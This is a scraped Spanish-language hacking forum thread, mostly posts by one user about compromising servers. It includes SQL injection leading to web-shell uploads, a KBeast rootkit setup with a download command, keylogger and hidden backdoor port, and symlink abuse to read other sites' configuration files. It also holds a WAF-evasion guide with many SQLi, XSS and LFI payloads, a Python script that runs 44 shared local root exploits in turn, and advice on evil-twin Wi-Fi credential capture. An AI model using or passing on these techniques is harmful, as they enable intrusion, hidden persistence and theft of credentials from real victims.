estuve tanteando el server y encontre como 15 webs vulnerables a sqli, ademas de obtener los datos, pero parece ser que todas tiene el mismo usuario y password admin:james77 ademas de redirigir al mismo panel web.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Cita de: [Q3rV[0] link=topic=11433.msg40891#msg40891 date=1349763690]

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Cita de: [Q3rV[0] link=topic=11433.msg40889#msg40889 date=1349763117]

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Si encontras el usuario y contrasenia del servidor SQL te podes conectar directamente y de ahi hacer un SELECT into outfile,etc.. para subir una shell.

siempre y cuando cuente con privilegios de FILE

Por eso mismo lo dije.

? le acabas de decir que crackee el hash de la db y entre, una pérdida de tiempo total, pudiendolo hacer desde la inyeccion

No es una perdida de tiempo si es que desde el usuario que se hace la inyeccion no tiene privilegios de file, y cualquier sitio bien configurado no comete ese error.

En ése caso no te lo discuto, pero ahora estamos hablando de un current_user root que posee ésos privs

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Cita de: [Q3rV[0] link=topic=11433.msg40889#msg40889 date=1349763117]

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Si encontras el usuario y contrasenia del servidor SQL te podes conectar directamente y de ahi hacer un SELECT into outfile,etc.. para subir una shell.

siempre y cuando cuente con privilegios de FILE

Por eso mismo lo dije.

? le acabas de decir que crackee el hash de la db y entre, una pérdida de tiempo total, pudiendolo hacer desde la inyeccion

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Si encontras el usuario y contrasenia del servidor SQL te podes conectar directamente y de ahi hacer un SELECT into outfile,etc.. para subir una shell.

No tiene por que conectarse a la db desde el path vulnerable a sqli puedo realizar un into outfile directamente siempre y cuando cuente con privilegios de FILE

Si tenés acceso físico a la maquina podés resetear el password del usuario root a travez del grub, solo tenés que editar la linea kernel por "rw init=/bin/bash con esto obtendrás una shell al inicio del sistema  con privilegios de root de hay en adelante cambias el password de root y ya podés ingresar con todos los privilegios

que error te tira??

La idea es ir intercalando scripts con diferentes parámetros usando el dork inurl:

por ejemplo ahora se me viene a la cabeza un nombre de script como papers.php de hay en más podés ir probando con diversos parámetros como:

inurl:papers.php?id=
inurl:papers.php?p=

Etc

no tiene mucha ciencia es cuestión de usar un poco el bocho

man no uses las listas de dorks que hay por todo internet, crea los tuyos propios, es cuestion de imaginacion, ponete a pensar que no sos el unico que utiliza esa lista y como decis la gran mayoria de esos servers ya fueron explotados.

La verdad que hacia rato que andaba buscando algo como esto, da bastante paja leer estos articulos directamente en ingles y aun mas si tener un conocimiento adecuado del idioma , pero navengando por ahi, me encuentro con unos articulos interesantisimos, de echo es algo de lo que se habla muy poco en los blogs, foros, pdf's de habla hispana, es un tema tambien que mete miedo, pero es vital para expandir conocimientos y nivelear en este mundo (?)...

Creación de Exploits por corelanc0d3r traducidos por Ivinson
Creación de Exploits 1: Desbordamiento de Stack por corelanc0d3r traducido por Ivinson
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
 
Creación de Exploits 2: Desbordamiento de Stack  por corelanc0d3r traducido por Ivinson
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
 
Creación de Exploits  3: SEH  por corelanc0d3r traducido por Ivinson
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
 
Creación de Exploits 3b: SEH  por corelanc0d3r traducido por Ivinson
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Creacion de Exploits 4: De Exploit a Metasploit por corelanc0d3r traducido por Ivinson
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
 
Creación de Exploits 5:  Acelerar el Proceso con Plugins y módulos por corelanc0d3r traducido por Ivinson
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
 
Exploits Evitando SEHOP por SYSDREAM IT Security Services traducido por Ivinson
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
 
Creación de Exploits 6: Cookies del Stack SafeSEH, SEHOP, HW DEP y ASLR  por corelanc0d3r traducido por Ivinson
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
 
Creación de Exploits 7: Unicode -  De 0×00410041 a la Calc  por corelanc0d3r traducido por Ivinson
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Creación de Exploits 8: Cacería de Huevos en Win32 por corelanc0d3r traducido por Ivinson
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Creacion de Exploits 9: Introducción al Shellcoding en  Win32 por corelanc0d3r traducido por Ivinson
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Creación de Exploits 10: Uniendo DEP con ROP - El Cubo de Rubik [TM] por corelanc0d3r traducido por Ivinson.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


PD: No duermo en toda la noche! XD

Siempre es conveniente asegurarse el silencio luego de una intrusion, y con que me refiero al silencio? Ademas de entrar en el tema de borrado de huellas, me refiero a la accion de dejar un secuas en el servidor que se encargue de ocultar ciertos procesos, archivos, etc que dejemos en el target para esto voy a utilizar a KBeast que es un rootkit 2011, ademas de uno de mis preferidos, tiene soporte para los kernel 2.6.18 y 2.6.32,y presenta varias funcionalidades interesantes como:

-Ocultar archivos y directorios

-Ocultar procesos de (ps, pstree, top, lsof)

- Ocultar puertos locales abiertos (backdoors)

-Viene con un modulo keylogger incorporado para capturar las pulsaciones.

-Anti-kill para procesos

-Anti-remove para archivos

-Trae un backdoor bind incorporado

- Tambien se encarga de esconder ciertos modulos cargando en el kernel ademas de un anti-remove para estos.

bastante completita la basura!, demas esta decir que requerimos de privilegios de usuario root, en este caso lo voy a realizar en un debian con un kernel 2.6.32 (entorno controlado)

descargamos el rootkit.

wget http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz

una vez extraido nos encontramos con varios files, tendremos que editar a nuestro antojo el archivo de configuracion config.h

/*
Kernel Beast Ver #1.0 - Configuration File
Copyright Ph03n1X of IPSECS (c) 2011
Get more research of ours http://ipsecs.com
*/

/*Don't change this line*/
#define TRUE 1
#define FALSE 0

/*
Enable keylog probably makes the system unstable
But worth to be tried
*/
#define _KEYLOG_ TRUE

/*Define your module & network daemon name*/
#define KBEAST "kbeast"

/*
All files, dirs, process will be hidden
Protected from deletion & being killed
*/
#define _H4X0R_ "_h4x_"

/*
Directory where your rootkit will be saved
You have to use _H4X0R_ in your directory name
No slash (/) at the end
*/
#define _H4X_PATH_ "/usr/_h4x_"

/*
File to save key logged data
*/
#define _LOGFILE_ "acctlog"

/*
This port will be hidded from netstat
*/
#define _HIDE_PORT_ 13377

/*
Password for remote access
*/
#define _RPASSWORD_ "h4x3d"
#define _MAGIC_NAME_ "bin"
/*
Magic signal & pid for local escalation
*/
#define _MAGIC_SIG_ 37 //kill signal
#define _MAGIC_PID_ 31337 //kill this pid

prosigo a explicar la funcion de cada linea en el fichero de configuracion.


1- La primera linea la dejamos tal cual esta

2- la segunda se encarga de activar el modulo keylogger del rootkit en caso contrario escribimos

#define _KEYLOG_ FALSE

3- se encarga de darle el nombre al daemon rootkit

#define KBEAST "q3rv0"

4 - En esta linea vamos a incluir los ficheros y directorios que queremos que sean protegidos por el anti-remove.

#define _H4X0R_ "/home/q3rv0/protect/q3rv0.txt"

5- Define el directorio donde se guardara KBeast

#define _H4X_PATH_ "/usr/share/kbeast"

6 - Aca especificamos el nombre del fichero de log donde van a ir a parar las pulsasiones capturadas por el keylogger

#define _LOGFILE_ "acctlog"

7- El puerto que estara hide a la vista de los comandos anteriormente mencionados.

#define _HIDE_PORT_ 6666

8- Incluimos el password para el acceso con el backdoor.

#define _RPASSWORD_ "q3rv0"
#define _MAGIC_NAME_ "bin"

Habiendo terminado de configurar el ficherito, que bastante intuitivo es, si me saltee la 9, pero esa la dejo tal cual esta.


Procedemos a lanzar el rootkit de la siguiente manera.

En los kernel 2.6.18

./setup buil 0

En los 2.6.32 como es mi caso

./setup build

Vemos que se compilo exitosamente en el nucleo sin ningun error, ahora vamos a comprobar si cumple con nuestras espectativas.

-Verificando la proteccion anti-remove de ficheros




- Directorio donde se guarda el rootkit en el systema




- Pulsaciones capturadas por el modulo keylogger...
  El fichero de log se guarda en el directorio donde le indicamos que se guarde el rootkit.




- Port 6666 Hide




- Accediendo al sistema a travez del backdoor en el puerto 6666




- oka, para remover el rootkit del kernel solo basta realizar un:

./setup clean

Espero que lo hayan disfrutado y cada vez que rooteen un server acuerdense de kbeast


Saludos!

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Bueno les comento, el problema que tengo que voy a hacer Symlink con una tool o una shell de  symlink y bueno cuando hago el  symlink me sale este error  /etc/named.conf, entonces mi rpegunta es:

que es eso?
como lo soluciono?
y por que sale?

el fichero /etc/named.conf es un archivo en el que se guardan los nombres de dominio que conviven en el servidor, symlink lo que hace es buscar en ese fichero la ruta de los dns, manualmente podes hacerlo de la siguiente manera, para ver la ruta de los dominios podes buscar en el archivo /etc/passwd, o en en el fichero httpd.conf.

Para hacerlo manualmente, por ejemplo para obtener el archivo de configuracion de un sitio con joomla (configuration.php).

ln -s /var/www/www.host.com/configuration.php /tmp/enlace-configuration.php

este es un ejemplo que te hago /tmp/enlace-configuration.php (el path destino donde creas el enlace)

cualquier duda comentame.

Motivos?

- Negocios turbios

- Tráfico de Drogas Y Trata de menores

"EL VERDADERO MUNDO DETRÁS DE LA PANTALLA DE LUCES Y TRAGAPERRAS"



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

man si el usuario en la db corre con privilegios de UPDATE por lo que decis que lograste cambiar el pas del admin y entrar al panel, por que no intentas actualizar el hash del plugin??

claro!, al final termine subiendo una shell en perl y la configure como modulo cgi con .htaccess XD

WAF PWNED!



[0x1] -------------- Que es un WAF?

[0x2] -------------- Reconocimiento de un Firewall de aplicaciones web

[0x3] -------------- Tecnicas de evacion SQL
                     
                     [0x2a] ------------ Utilizando comentarios

                     [0x2b] ------------ Uso de la funcion CHAR()

                     [0x2c] ------------ HPP (Polucion de parametros HTTP)

                     [0x2d] ------------ HPF (Fragmentacion de parametros HTTP)



-------------------------------------------+


[0x1] Que es un WAF?


-------------------------------------------+

Ultimamente, me fui encontrando con aplicaciones que por algun motivo y siendo vulnerables
me saltaban con un error del tipo 501 (method no implementado), o directamente al realizara algun tipo de inyeccion, el servidor me enviava un flag FIN y
terminaba paradado con un mensajito de "The concexion was reSet", sospechoso, no?, por esta razon decidi escribir a cerca de los WAF (firewalls de aplicaciones web)
Para quien no conozco de su existencia, los WAF se encargan de mediar entre el cliente y servidor, filtrando la entrada de caracteres segun la configuracion de seguridad del mismo.
Existen varios de estos, uno de los mas conocidos es ModSecurity, pero ademas de este muchas aplicaciones corren con:

-Libhtp

-Ironbee

y demas...

Un WAF trabaja en la capa de aplicacion, controlando la entrada de datos en protocolos como HTTP/HTTPS/SOAP/XML-RPC y segun el trafico que se halle en la blacklist de su configuracion enviaran un mensaje de alerta ante determinado vector de ataque tales como:

http://vulnpage/alal.php?vuln=9999"><script>alert(/waf/)</script> XSS

http://vulnpage/alal.php?vuln=9999'+or+'5'>='3-- SQLI

http://vulnpage/alal.php?vuln=../../../../../lol%00 LFI


http://vulnpage/alal.php?vuln=No tienes permitido ver los links. Registrarse o Entrar a mi cuenta? RFI

ETC...

-------------------------------------------------+



[0x2] Reconocimiento de un Firewall de aplicaciones web



--------------------------------------------------+


Como descubrimos la presencia de un WAF en la aplicacion?

Generalmente las respuestas de tipo:

- 501 (method not implemented)

- Conexion reseteada por parte del servidor

- Mensaje 403

- Redireccionamiento hacia la pagina de inicio

Estos son indicios de la presencia de algun tipo de mediador que nos esta hinchando las pelotas XD!

Una de las maneras de obtener el tipo de waf que protege un servidor, es indagando
dentro de las respuestas en las cabeceras http.

Para ello, si estamos en duda de que la aplicacion corre con un firewall web, podemos usar el buscador shodan, para cersiorarnos de  que en realidad es asi.


Dork: "host:"Underterminal.com" Mod_security enabled"



Informacion del tipo y version de WAF en la cabecera Server.

------------------------+
HTTP/1.0 200 OK
Date: Mon, 10 Sep 2012 20:25:38 GMT
Server: Mod_Security 2.5.9 enabled
Last-Modified: Wed, 13 Jul 2011 07:12:51 GMT
ETag: "c902e9-2c-4a7ee24f602c0"
Accept-Ranges: bytes
Content-Length: 44
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
---------------------------+


Otra es usando herramientas o scripts que se encarguen de realizar un fingerprinting sobre estos como por ejemplo http-waf-detect.nse, un motor encargado de la deteccion de waf's incorporado en nmap.

Podemos utilizarlo de la siguiente manera:

nmap -Pn -n -VV -T2 --script=http-waf-detect.nse "TARGET"


Veamos que pasa con papa google?

--------------------------------------------------------------+

nmap -p80 -vv -T2 -Pn -n  --script http-waf-detect No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Starting Nmap 6.01 ( No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ) at 2012-09-11 01:38 ART
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 1) scan.
Warning: Hostname No tienes permitido ver los links. Registrarse o Entrar a mi cuenta resolves to 11 IPs. Using 74.125.229.37.
Initiating SYN Stealth Scan at 01:38
Scanning No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (74.125.229.37) [1 port]
Discovered open port 80/tcp on 74.125.229.37
Completed SYN Stealth Scan at 01:38, 0.44s elapsed (1 total ports)
NSE: Script scanning 74.125.229.37.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 01:38
Completed NSE at 01:38, 13.07s elapsed
Nmap scan report for No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (74.125.229.37)
Host is up (0.039s latency).
Other addresses for No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (not scanned): 74.125.229.38 74.125.229.39 74.125.229.40 74.125.229.41 74.125.229.46 74.125.229.32 74.125.229.33 74.125.229.34 74.125.229.35 74.125.229.36
Scanned at 2012-09-11 01:38:24 ART for 13s
PORT   STATE SERVICE
80/tcp open  http
| http-waf-detect: IDS/IPS/WAF detected:
|_google.com:80/?p4yl04d3=<script>alert(document.cookie)</script>

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 1) scan.
Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 13.85 seconds
           Raw packets sent: 1 (44B) | Rcvd: 1 (44B)
-------------------------------------------------------------------+



[0x3] Tecnicas de Evacion SQL




[0x3a] Utilizando comentarios



--------------------------------------------------------------+


Las tecnicas de evacion de waf, se centran en engañar al firewall para inyectar los caracteres que se encuentran en la "Blacklist", hay varios metodos de evacion, veamos algunos implementandolos en inyecciondes SQLI

Los comentarios /*!*/ pueden ser utilizados para vestir a ciertas sentencias que dejan una alerta en la aplicacion, veamos el siguiente ejemplo.

El siguiente path es vulnerable a sqli.

http://somepage/intranet.php?id=[SQLI]

"MYSQL ERROR en la sintaxis"

Enumeramos columnas de la tabla.

http://somepage/intranet.php?id=9999+order+by+5

FALSE!, hasta ahora sabemos que la tabla que interactua con el script intranet.php posee 4 columnas, vamos a ver que pasa con la tecnica UNION.

http://somepage/intranet.php?id=9999+UNION+SELECT+1,2,3,4+AND+1=1

501 METHOD NOT IMPLEMENTED! LOL!

Una vez que se realizo el reconocimiento de algun tipo de WAF en la aplicacion, ya sabemos que hay ulguna clausula que esta siendo filtrada por este.

Tratemos de evadir la blacklist, utilizando los tag /**/ o /*!*/

http://somepage/intranet.php?id=9999+/*!UNION*/+/*!SELECT*/+1,2,3,4+/*!AND*/+1=1

2
  3

Bien, hemos logrado saltarnos la pared del WAF.

Utilizando /**/ como %20:

http://somepage/intranet.php?id=9999/**//*!UNION*//**//*!SELECT*//**/1,2,3,4/**//*!AND*//**/1=1

De ahora en mas podemos ir variando la estructura de la sentencia, una manera seria cortar cada clausula con /**/

http://somepage/intranet.php?id=9999/**//*UN/**/ION*//**//*SEL/**/ECT*//**/1,2,3,4/**//*AND*//**/1=1

Tambien podemos utilizar dobles clausulas en el mismo vector:

http://somepage/intranet.php?id=9999+/*UNION*/+UNION+/*SELECT*/+SELECT+1,2,3,4+/*AND*/+1=1

fijense como una esta entre los tags /**/ y otra no.

----------------------------------------------------------------------+


[0x3b] Uso de la funcion CHAR()


----------------------------------------+


CHAR() es una funcion sql que basicamente transforma un caracter/s en ascii a string.

por ejemplo q=113

mysql> SELECT ASCII('q');
+------------+
| ascii('q') |
+------------+
|        113 |
+------------+
1 row in set (0.00 sec)

mysql> SELECT CHAR(113);
+-----------+
| CHAR(113) |
+-----------+
| q         |
+-----------+
1 row in set (0.00 sec)

mysql> SELECT CHAR(91, 81, 93, 51, 114, 86, 91, 48, 93);
+-------------------------------------------+
| CHAR(91, 81, 93, 51, 114, 86, 91, 48, 93) |
+-------------------------------------------+
| [Q]3rV[0]                                 |
+-------------------------------------------+
1 row in set (0.00 sec)

Entonces ya nos podemos ir dando una idea de como ofuscar nustro vector.

http://somepage/intranet.php?id=9999+UNION+SELECT+1,2,3,4+AND+1=1

Quedaria mas o menos de la siguiente manera vistiendo a UNION & SELECT

http://somepage/intranet.php?id=9999+CHAR(117, 110, 105, 111, 110)+CHAR(115, 101, 108, 101, 99, 116)+1,2,3,4+AND+1=1


-------------------------------------------------------------+


[0x3c] HPP (Polucion de parametros HTTP)


-----------------------------------------+


La vulnerabilidad HPP puede ser aprovechada para insertar nuestros vectores en la aplicacion y asi poder decierle al WAF "OWNED BABY!"

Pero que es HPP??

HPP (Polucion de parametros HTTP) es una vulnerabilidad web que no tiene muchos años de nacida, fue descubierta en el 2009,
esta tecnica se centra en inyectar varios valores en un mismo parametro, bien, ustedes se deben estar preguntando, pero de que me sirve ante la evacion de un firewall web??

Sabemos que los usuarios interactuan con aplicaciones dinamicas a travez de un parametro, hay variable que almacenan varios valores, pero otras que se encargan de almacenar 1 solo valor, en ese tipo de var que pasaria si le introdujeran dos valores diferentes??

Segun la tecnlogia que utilice la aplicacion reaccionara de determinada forma, aca les pongo un par de ejemplos de como toman 2 o mas valores distintas tecnologias web.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -------------------> concacatena dos o mas valores con una coma

ejemplo: id=q3rv0,[Q]3rV[0]

PHP/APACHE ---------------------> imprime el segundo valor de 2

ejemplo: id=q3rv0&id=[Q]3rv[0] lo que se interpretara en el servidor sera el segundo valor [Q]3rv[0]

Bien vallamos a la accion, los WAF's generalmente verifican cadas variable por separado, es decir si utilizamos el siguiente vector para ofucar codigo aprovechando un HPP


http://somepage/intranet.aspx?id=9999+OR+1=COVERT(INT,(@@VERSION))--

Evacion: http://somepage/intranet.aspx?id=9999+CONVERT(INT&id=(@@VERSION))--

Con esto engañariamos al firewall debido a que no podra identificar el vector de ataque entero.

Por lo tanto al tratarse de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y sabiendo que concatena dos valores con coma el codigo se ejecutaria de la siguiente manera en el server.

SELECT user_name FROM usuarios WHERE id= 9999+OR+1=COVERT(INT,(@@VERSION))--

OWNEANDO al WAF y obeteniendo la version del DBMS.

Otra manera de darle mas dinamismo a esta tecnica es utilizando /**/ entre las variables

Que pasaria si el WAF nos detectara la inyeccion anterior por que tomaria como ofensivo el vector id=9999+CONVERT(INT

si desearamos usar mas parametros para evadirlo asi:

http://somepage/intranet.aspx?id=9999&id=OR+1=&id=CONVERT&id=(INT&id=(@@VERSION))--

La inyeccion se procesaria de esta manera en la base de datos:

SELECT user_name FROM usuarios WHERE id=9999,OR+1=,CONVERT,(INT,(@@VERSION))--

Esto daria error de sintaxis, para solucionarlo utilizaremos nuestra amiga /**/ vistiendo cada parametro


Quedando de la siguiente manera:

http://somepage/intranet.aspx?id=9999/*&id=*/OR+1=/*&id=*/CONVERT/*&id=*/(INT&id=(@@VERSION))--


Ahora si podemos decir OWNED BABY!


----------------------------------------------------------+



[0x3d] HPF (Fragmentacion de parametros HTTP)



-------------------------------------------------------+


La fragmentacion de parametros HTTP me recuerda a cuando utilizamos la opcion -f de nmap para fragmentar paquetes IP y asi evadir las estrictas reglas del firewall, esta tecnica no es muy diferente a la que mencione anteriormente (HPP), la unica diferencia es que podemas usarla algun path que utilize varios parametros

por ejemplo tenemos la siguiente url:

http://lalala/index.aspx?id=1&nan=2&lala=3

Podemos fragmentar el vector de ataque entre las variables

id=
nan=
lala=

Supongamos que el servidor corre co una base de datos MYSQL que no es muy comun, en su mayoria las web que utilizan tecnologia No tienes permitido ver los links. Registrarse o Entrar a mi cuenta o ASP, corren con algun SQL SERVER 200*

Inyectando normalmente: http://lalala/index.aspx?id=1 UNION SELECT 1,2,concat(username, 0x3a, password)+FROM+admin+LIMIT+1,1--&nan=2&lala=3

Para fragmentar dicho vector y siempre recordando que No tienes permitido ver los links. Registrarse o Entrar a mi cuenta concatena 2 o mas valores con , podriamos intentar asi:


http://lalala/index.aspx?id=1+UNION+SELECT+1/*&nan=*/2,concat(username, 0x3a, password)/*&lala=*/FROM+admin+LIMIT+1,1--

Podemos usar la imaginacion para moldear varios tipos de ataque con ambas tecnicas, recordando siempre y cuando como trabaja y toma los valores la tecnologia que corre en el servidor.






Saludos!!

Aqui les dejo un pdf que escribi, mostrando el uso de unix-privesc-check

y como a veces es factible en sistemas mal configurados, en el documento

muestro como logro conseguir acceso root en el servidor sin tener que

hacer uso de ningun exploit publico o privado.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Para complentar un poco mas con este temas, les dejo tambien un articulo interesante que muestra otra de las tantas maneras en las cuales se puede aprovechar para elevar privilegios en un sistema comprometido y los invito a pasarse por la web de Alguien en la que se encuentra muy buena calidad de informacion avanzada.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Bytes!

Proba con estos:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Method=POST

Path Vuln= searchForm=[XSS]

Hace un par de dias un amigo me paso 44 local root exploits ya compilados previamente, hay de todo, para kernels, 2007, 2010, 2011, tambien hay algunos priv8 y se los comparto.
Ademas decidi armar un sencillo autoroot en python para lanzarlos.

#!/usr/bin/python
import os
import subprocess
banner= """                                         
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+-+-+-+-+-+-+-+-++-+--------+-+-+-+-+-+-+-+-+-+-+                    
+            AUTOROOT BY [Q]3rV[0]              +                                             
+-+-+-+-+-+-+-+-+--+-+-+-+-+-+-+-+-+-+-+-+-+--+-+
+ By [Q]3rv[0]                                  +
+ Site: http://underterminal.nixiweb.com        +
+ Mail: under.terminal[at]gmail[dot]com          +
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ 
                                                 """               
print chr(27)+"[1;31m"+ banner
print chr(27)+"[0m"
exploit=0
comando="id"
privs=subprocess.Popen(comando, shell=True, stdout=subprocess.PIPE).stdout.read()
print chr(27)+"[1;31m"+"[*] Cargando Exploit's..."
print chr(27)+"[0m"
while exploit <= 43:
    exploit=exploit+1
    print chr(27)+"[1;31m"+"[0x"+str(exploit)+"] Corriendo..."
    print chr(27)+"[0m"
    os.system('./'+str(exploit))
    if privs.find('root')!=-1:
        print chr(27)+"[4;31m"+"[+GOOD!+] Server R00te3d x Exploit [0x"+str(exploit)+"]"
        print chr(27)+"[0m"
        break
    else:
        print chr(27)+"[1;31m"+"[-WRONG!-] El exploit [0x"+str(exploit)+"] no pudo R00tear!"
        print chr(27)+"[0m"

Exploit-Pack: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Saludos!

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Buenas tengo una duda ¿ con el ghost phisher vercion 1.5 se puede hacer una tecnica llamada evil twin ? es clonar el ap verdadero y despues la persona cuando entre al ap falso se le redija una web solicitando su pass wpa ¿hay que instalar el dhcp o ya el propio ghost phisher trae su propio dhcp? gracias y un saludo

Man, para eso esta la tecnica caffe late attack, que basicamente es lo mismo, se clona el punto de acceso, pero solo funciona si el cliente tiene configurada la conexion en modo automatica y con el pass recordado, entonces si se logra clonar el ap del vecino, y lo encontras en un cafe..ponele, lanzas el ap falso, obiviamente con los datos del apn de su casa con el mismo essid y bssid blabla, automaticamente al detectar el punto de acceso se conectaria de forma automatica y los datos serian capturados con airodump, no hace falta que sea redireccionado a una falsa web para que deje sus datos, en la mayoria de las note, la gente deja configurada de manera automatica las conexiones con su ap.